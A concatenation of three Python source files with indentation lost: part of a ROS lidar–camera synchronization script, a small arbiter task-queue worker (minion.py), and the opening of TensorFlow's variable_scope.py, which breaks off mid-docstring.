camera_model = load_obj('{}_combined_camera_model'.format(name))
camera_model_rectify = load_obj('{}_combined_camera_model_rectify'.format(name))
K_left = camera_model['K_left']
K_right = camera_model['K_right']
D_left = camera_model['D_left']
D_right = camera_model['D_right']
K = K_right
D = D_right
calib_file = '/home/eugeniu/catkin_ws/src/testNode/CAMERA_CALIBRATION/combined_extrinsics{}.npz'
calib_file = '/home/eugeniu/catkin_ws/src/testNode/CAMERA_CALIBRATION/solvePnP_extrinsicscharuco.npz'
with open(calib_file, 'r') as f:
data = f.read().split()
# print('data:{}'.format(data))
qx = float(data[0])
qy = float(data[1])
qz = float(data[2])
qw = float(data[3])
tx = float(data[4])
ty = float(data[5])
tz = float(data[6])
q = Quaternion(qw, qx, qy, qz).transformation_matrix
q[0, 3], q[1, 3], q[2, 3] = tx, ty, tz
tvec = q[:3, 3]
rot_mat = q[:3, :3]
rvec, _ = cv2.Rodrigues(rot_mat)
return rvec, tvec,q, K,D
rvec, tvec,q, K, D = readCalibration()
rospy.init_node('testNode', anonymous=True)
global myI
myI = 10
bridge = CvBridge()
display = True
display = False
plotTimeLine = False
useColor = True
#useColor = False
useMeanTime = True #used the mean time for each laser scan
#useMeanTime = False
velodyne_points = '/lidar_VLS128_Center_13202202695611/velodyne_points'
left_cam = '/camera_IDS_Left_4103423533/image_raw'
left_cam_topic_extras = '/camera_IDS_Left_4103423533/extras'
left_cam = '/camera_IDS_Right_4103423537/image_raw'
left_cam_topic_extras = '/camera_IDS_Right_4103423537/extras'
right_cam = '/camera_IDS_Left_4103423533/image_raw'
Syncronized_Lidar_pub = rospy.Publisher(velodyne_points, PointCloud2, queue_size=200)
Syncronized_Cam_pub = rospy.Publisher(left_cam, Image, queue_size=200)
r,g,b, a = int(0 * 255.0),int(1 * 255.0),int(0 * 255.0), 255
rgb = struct.unpack('I', struct.pack('BBBB', b, g, r, a))[0]
r,g,b, a = int(1 * 255.0),int(0 * 255.0),int(0 * 255.0), 255
rgb_red = struct.unpack('I', struct.pack('BBBB', b, g, r, a))[0]
cmap = matplotlib.cm.get_cmap('hsv')
def hsv_to_rgb(h, s, v):
if s == 0.0:
return v, v, v
i = int(h * 6.0)
f = (h * 6.0) - i
p = v * (1.0 - s)
q = v * (1.0 - s * f)
t = v * (1.0 - s * (1.0 - f))
i = i % 6
if i == 0:
return v, t, p
if i == 1:
return q, v, p
if i == 2:
return p, v, t
if i == 3:
return p, q, v
if i == 4:
return t, p, v
if i == 5:
return v, p, q
removeShadow = True
#removeShadow = False
global STOP, cloud_points_save, left_image_Save, right_image_Save
def publishSyncronized_msg(cloud_synchronized,image_synchronized, image_synchronized2=None, pixel_opacity = 1):
try:
# publish lidar
header = std_msgs.msg.Header()
header.stamp = rospy.Time.now()
header.frame_id = 'VLS128_Center'
# columns=["X", "Y", "Z",'rgb',"intens","ring","time"]
if useColor:
objPoints_left = cloud_synchronized[:,:3]
Z = get_z(q, objPoints_left, K)
cloud_synchronized = cloud_synchronized[Z > 0]
objPoints_left = objPoints_left[Z > 0]
points2D, _ = cv2.projectPoints(objPoints_left, rvec, tvec, K, D)
points2D = np.squeeze(points2D)
image = bridge.imgmsg_to_cv2(image_synchronized, "bgr8")
inrange = np.where(
(points2D[:, 0] >= 0) &
(points2D[:, 1] >= 0) &
(points2D[:, 0] < image.shape[1] - 1) &
(points2D[:, 1] < image.shape[0] - 1)
)
points2D = points2D[inrange[0]].round().astype('int')
cloud_synchronized = cloud_synchronized[inrange[0]]
#filter again here -> save the closest to the camera
distance = np.linalg.norm(cloud_synchronized[:, :3], axis=1)
if removeShadow:
'''sort points by distance'''
idx_sorted = np.argsort(distance) #ascending
idx_sorted = idx_sorted[::-1] #descending
cloud_synchronized = cloud_synchronized[idx_sorted]
points2D = points2D[idx_sorted]
distance = distance[idx_sorted]
#cv2.imshow('image ',image)
#cv2.waitKey(1)
MIN_DISTANCE, MAX_DISTANCE = np.min(distance), np.max(distance)
colours = (distance - MIN_DISTANCE) / (MAX_DISTANCE - MIN_DISTANCE)
colours = np.asarray([np.asarray(hsv_to_rgb(0.75 * c, np.sqrt(pixel_opacity), 1.0)) for c in colours])
cols = pixel_opacity * 255 * colours
# print('colours:{}, cols:{}'.format(np.shape(colours), np.shape(cols)))
colors_left = image[points2D[:, 1], points2D[:, 0], :]
colors_left = np.array([getIfromRGB(col) for col in colors_left]).squeeze()
#greenColors = np.ones(len(cloud_synchronized))*rgb
cloud_synchronized[:, 3]=colors_left
image = cv2.Canny(image, 100, 200)
#for i in range(len(points2D)):
#cv2.circle(image, tuple(points2D[i]), 2, (0, 255, 0), 1)
#cv2.circle(image, tuple(points2D[i]), 2, cols[i], -1)
_pcl = pcl2.create_cloud(header=header, fields=fields, points=cloud_synchronized)
Syncronized_Lidar_pub.publish(_pcl)
# publish camera
Syncronized_Cam_pub.publish(bridge.cv2_to_imgmsg(image))
else:
_pcl = pcl2.create_cloud(header=header, fields=fields, points=cloud_synchronized)
Syncronized_Lidar_pub.publish(_pcl)
#publish camera
Syncronized_Cam_pub.publish(image_synchronized)
cloud_points_save = cloud_synchronized
left_image_Save = image_synchronized
right_image_Save = image_synchronized2
except Exception as e:
rospy.logerr(e)
def do_job(path, lidar_msgs, cam, cam_right):
global myI
print('cam_right -> {}'.format(np.shape(cam_right)))
print('got path:{}, lidar_msgs:{}, cam:{}'.format(np.shape(path), np.shape(lidar_msgs), np.shape(cam)))
if useMeanTime:
for (x1, x2) in path:
cloud_synchronized = lidar_msgs[x1]
image_synchronized = cam[x2]
try:
image_synchronized2 = cam_right[x2]
except:
image_synchronized2 = cam_right[x2-1]
# print('cloud_synchronized:{}, image_synchronized:{}'.format(np.shape(cloud_synchronized), np.shape(image_synchronized)))
publishSyncronized_msg(cloud_synchronized,image_synchronized, image_synchronized2)
l=bridge.imgmsg_to_cv2(image_synchronized, "bgr8")
r=bridge.imgmsg_to_cv2(image_synchronized2, "bgr8")
cv2.imshow('left', cv2.resize(l,None,fx=.4,fy=.4))
cv2.imshow('right', cv2.resize(r,None,fx=.4,fy=.4))
k = cv2.waitKey(1)
if k==ord('s'):
print('Sve cv2')
print('Saved {}, {}'.format(np.shape(l), np.shape(r)))
cv2.imwrite('/home/eugeniu/left_{}.png'.format(myI), l)
cv2.imwrite('/home/eugeniu/right_{}.png'.format(myI), r)
with open('/home/eugeniu/cloud_{}.npy'.format(myI), 'wb') as f:
np.save(f, cloud_synchronized)
myI+=1
else:
_lidar_synchro = []
lidar_msgs = np.vstack(lidar_msgs)
print('lidar_msgs -> {}'.format(np.shape(lidar_msgs)))
'''
vstack the lidar msg list
for all unique idx in camera in path
-take all lidar points that belongs to it
-publish them toghether
'''
unique_cam, indices = np.unique(path[:,1], return_index=True)
for i,u in enumerate(unique_cam):
inrange = np.where(path[:,1]==u) #take all lidar points that belongs to this cam msg
cloud_synchronized = lidar_msgs[inrange[0]]
image_synchronized = cam[i]
#print('cloud_synchronized:{}, image_synchronized:{}'.format(np.shape(cloud_synchronized), np.shape(image_synchronized)))
publishSyncronized_msg(cloud_synchronized,image_synchronized)
print(colored('Data published','green'))
cv2.destroyAllWindows()
k = 0
plot_data_left = deque(maxlen=200)
LiDAR_msg, LeftCam_msg, LeftCam_TimeSeries = [],[],[]
RightCam_msg = []
chessBag = '/home/eugeniu/chessboard_Lidar_Camera.bag'
charucoBag = '/home/eugeniu/charuco_LiDAR_Camera.bag'
bag = rosbag.Bag(charucoBag)
if display:
if plotTimeLine:
fig, (ax, ax2, ax3) = plt.subplots(3, 1)
else:
fig, (ax,ax2) = plt.subplots(2, 1)
ax.grid()
ax2.grid()
ax3.grid()
ppsLine, = ax.plot([0], 'b', label='PPS pulse')
ax.legend()
import time
import threading
skip = 1
history = []
from pynput.keyboard import Key, Listener
global STOP, cloud_points_save, left_image_Save, right_image_Save
STOP = False
def on_press(key):
try:
print('alphanumeric key {0} pressed'.format(key.char))
if key.char == 's':
print('Save data----------------------------------------')
else:
global STOP
STOP = True
except AttributeError:
print('special key {0} pressed'.format(key))
listener = Listener(on_press=on_press)
listener.start()
for topic, msg, t in bag.read_messages(topics=[left_cam, left_cam_topic_extras, velodyne_points, right_cam]):
#print('topic -> {}, msg->{} t->{}'.format(topic, np.shape(msg),t))
if topic == left_cam_topic_extras:# check pps and apply synchronization
pps = int(msg.pps)
m = 'pps->{}, LiDAR->{}, Cam->{}'.format(pps, np.shape(LiDAR_msg), np.shape(LeftCam_msg))
if pps == 1:
print(colored(m, 'red'))
lidar,cam = np.copy(LiDAR_msg),np.copy(LeftCam_msg) #get the copy of current buffer
cam_right = np.copy(RightCam_msg)
Cam_Time_series = np.copy(LeftCam_TimeSeries)
k=0.
LiDAR_msg, LeftCam_msg, LeftCam_TimeSeries = [], [], [] #clear the storage
RightCam_msg = []
#synchronize them
print('Cam_Time_series -> {}'.format(Cam_Time_series))
#lidar_msgs = np.array([np.array(list(pcl2.read_points(cloud_msg))).squeeze()[::skip,:] for cloud_msg in lidar]).ravel() # Msg x N x 6
lidar_msgs = lidar
LiDAR_Time_series = []
if useMeanTime:
for cloud in lidar_msgs:
LiDAR_Time_series = np.hstack((LiDAR_Time_series, np.mean(cloud[:, -1])))
else:
for cloud in lidar_msgs:
LiDAR_Time_series = np.hstack((LiDAR_Time_series, np.asarray(cloud[:,-1]).squeeze()))
LiDAR_Time_series = np.array(LiDAR_Time_series).squeeze()
LiDAR_Time_series = np.array([math.fmod(t, 2.0) for t in LiDAR_Time_series])
print('LiDAR_Time_series -> {}'.format(np.shape(LiDAR_Time_series)))
print('LiDAR_Time_series -> {}'.format(LiDAR_Time_series[:20]))
#DTW alignment
#_, path = fastdtw(LiDAR_Time_series, Cam_Time_series, dist=euclidean)
#path = np.array(path)
dist_mat = distance_matrix(LiDAR_Time_series[:, np.newaxis], Cam_Time_series[:, np.newaxis])
neighbours = np.argsort(dist_mat, axis=1)[:, 0] #for each lidar msg ge the closest neighbour from camera
path = np.array([np.linspace(start = 0, stop = len(LiDAR_Time_series)-1, num = len(LiDAR_Time_series), dtype = int), neighbours]).T
if LiDAR_Time_series[-1] < LiDAR_Time_series[-2]:
print(colored('delete last element', 'red'))
path = path[:-2]
print('path -> {}'.format(np.shape(path)))
pulish = True
pulish = False
start = time.time()
if pulish:
do_job(path, lidar_msgs, cam)
#_thread = threading.Thread(target=do_job,args=(path, lidar_msgs, cam))
#_thread.daemon = True
#_thread.start()
else:
history.append([path, lidar_msgs, cam, cam_right])
end = time.time()
print('the publish took {}'.format(end-start))
if display:
ax2.clear()
x,y = LiDAR_Time_series,Cam_Time_series
offsetY,offsetX = 3,int(len(path)/2)
ax2.plot(y + offsetY, c='b', label='Cam-{}'.format(len(y)), linewidth=2)
ax2.plot(np.linspace(start = 0, stop = len(x)-1, num = len(x), dtype = int)+offsetX,x, c='r', label='LiDAR-{}'.format(len(x)), linewidth=2)
for (x1, x2) in path:
ax2.plot([x1+offsetX, x2], [x[x1], y[x2] + offsetY], c='k', alpha=.5, linewidth=1)
ax2.grid()
ax2.legend()
#else:
#print(m)
if display:
plot_data_left.append(pps)
ppsLine.remove()
ppsLine, = ax.plot(plot_data_left, 'b', label='left cam')
fig.canvas.draw_idle()
plt.pause(0.001)
elif topic == left_cam: #store the camera msgs
LeftCam_msg.append(msg)
LeftCam_TimeSeries.append(k)
k += 0.05 # seconds
elif topic == velodyne_points: #store the LiDAR msgs
fields = msg.fields
if useColor:
fields.append(PointField('rgb', 12, PointField.UINT32, 1))
#LiDAR_msg.append(msg)
m = np.array(list(pcl2.read_points(msg))).squeeze() #N x 6
inrange = np.where(m[:, 1] > 1.5)
LiDAR_msg.append(m[inrange[0]])
elif topic == right_cam:
RightCam_msg.append(msg)
#columns=["X", "Y", "Z","intens","ring","time"]
if STOP:
print('Break ---------------------------')
break
bag.close()
print('Start publishing')
plt.close()
for item in history:
path, lidar_msgs, cam, cam_right = item
do_job(path, lidar_msgs, cam, cam_right)
|
minion.py
|
from arbiter import Minion
from multiprocessing import Process
from time import sleep
import logging
app = Minion(host="localhost", port=5672, user='user', password='password', queue="default")
@app.task(name="add")
def add(x, y):
logging.info("Running task 'add'")
# task that initiate new task within same app
increment = 0
for message in app.apply('simple_add', task_args=[3, 4]):
if isinstance(message, dict):
increment = message["result"]
logging.info("sleep done")
return x + y + increment
@app.task(name="simple_add")
def adds(x, y):
from time import sleep
sleep(10)
logging.info(f"Running task 'add_small' with params {x}, {y}")
return x + y
@app.task(name="add_in_pipe")
def addp(x, y, upstream=0):
logging.info("Running task 'add_in_pipe'")
return x + y + upstream
@app.task(name="long_running")
def long_task():
sleep(180)
return "Long Task"
def run(rpc):
if rpc:
app.rpc(workers=1, blocking=True)
else:
app.run(workers=10)
def start_minion(rpc: bool = False) -> Process:
p = Process(target=run, args=(rpc,))
p.start()
sleep(5) # some time to start Minion
return p
def stop_minion(p: Process):
p.terminate()
p.join()
if __name__ == "__main__":
run(False)
|
variable_scope.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as collections_lib
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable",
"get_local_variable", "variable_scope", "variable_op_scope",
"no_regularizer", "VariableSynchronization", "VariableAggregation"
]
class _PartitionInfo(object):
"""Holds partition info used by initializer functions.
"""
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape
of the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_lib.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_lib.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for i in xrange(len(full_shape)):
offset = var_offset[i]
shape = full_shape[i]
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_lib.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(
shape), self.full_shape, len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
# TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
# TODO(apassos) remove these forwarding symbols.
VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name
VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
_DEFAULT_USE_RESOURCE = False
@tf_export(v1=["enable_resource_variables"])
def enable_resource_variables():
"""Creates resource variables by default.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = True
@deprecation.deprecated(
None, "non-resource variables are not supported in the long term")
@tf_export(v1=["disable_resource_variables"])
def disable_resource_variables():
"""Opts out of resource variables.
If your code needs tf.disable_resource_variables() to be called to work
properly please file a bug.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = False
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys
and the corresponding TensorFlow Variables as values.
"""
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
`trainable` defaults to `True` unless `synchronization` is
set to `ON_READ`.
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True).
When eager execution is enabled this argument is always forced to be
true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
raise ValueError(
"Passed a custom_getter which is not callable: %s" % custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
# If a *_ref type is passed in an error would be triggered further down the
# stack. We prevent this using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter( # pylint: disable=missing-docstring
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
is_scalar = (shape is not None
and isinstance(shape, collections_lib.Sequence)
and not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError(
"Partitioner must be callable, but received: %s" % partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Set trainable value based on synchronization value.
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
"synchronization": synchronization,
"aggregation": aggregation,
}
# `fn_args` and `has_kwargs` can handle functions, `functools.partial`,
# `lambda`.
if ("constraint" in function_utils.fn_args(custom_getter) or
function_utils.has_kwargs(custom_getter)):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
name,
partitioner,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: the name of the new or existing sharded variable.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable
(defaults to `DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
